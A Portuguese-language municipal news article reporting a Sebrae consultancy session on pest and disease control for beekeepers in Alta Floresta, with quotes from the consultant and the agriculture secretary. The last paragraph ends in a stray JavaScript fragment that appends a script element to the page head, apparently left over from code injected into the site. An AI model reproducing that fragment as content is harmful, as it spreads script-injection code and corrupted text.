Capa / Cidades / Apicultores de Alta Floresta participam de consultoria de pragas em apiários

Apicultores de Alta Floresta participam de consultoria de pragas em apiários

29-03-2016-Apicultores de Alta Floresta participam de consultoria que abordou pragas em apiários (1)Giselle Oliveira
Assessoria da PMAF

A capacitação dos produtores de mel de Alta Floresta é uma atividade realizada no município através de Consultoria da Apicultura, promovida em parceria da Prefeitura de Alta Floresta por meio da Secretaria Municipal de Agricultura, Pecuária e Desenvolvimento Rural com o Serviço Brasileiro de Apoio ás Micro e Pequenas Empresas (Sebrae/MT).
Nesta semana, foi realizada mais uma capacitação cuja discussão foi o controle de pragas nos apiários, que podem causar problemas para as abelhas, tanto na fase de larva quanto na fase adulta, e acabar com o apiário inteiro, explica o consultor do Sebrae, Robson Raad.
Conforme Robson Raad é necessário que os produtores façam o extermínio total dessas pragas, pois além de afetar todo o apiário, dependendo da praga pode matar animais no pasto. “É necessário fazer o controle com pesticidas no apiário, para evitar o surgimento de novas pragas, que estão contaminando os apiários no Brasil afora, essas pragas comem o polém que está na cera”, completa Raad.
Outro fator, que os apicultores devem levar em consideração, é que a ocorrência de doenças nas colmeias pode acarretar prejuízos na diminuição da produtividade, uma vez que o aumento da mortalidade, tanto de crias como de abelhas adultas, leva a uma redução da população da colmeia com consequente redução da produção. Em casos mais graves, o apicultor poderá perder enxames, já que as abelhas africanizadas costumam abandonar as colmeias quando a população cai abaixo de 4 mil indivíduos e quando há muita cria morta.
Participaram apicultores de mel de Alta Floresta, que tem o objetivo de melhorar suas produções e aprender técnicas com um especialista no assunto, já que a região tem o bioma amazônico, com abelhas nativas, e com as técnicas e orientações, o sistema de produção pode ser aperfeiçoado.
Segundo a secretária de Agricultura, Pecuária e Desenvolvimento Rural, Aparecida Sicuto, essa parceria entre a Prefeitura de Alta Floresta e o Sebrae é importante, pois propicia oportunidade de conhecimento e aprendizagem para os apicultores. “É uma troca de experiência muito importante para esses apicultores”, ressalta Sicuto.d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top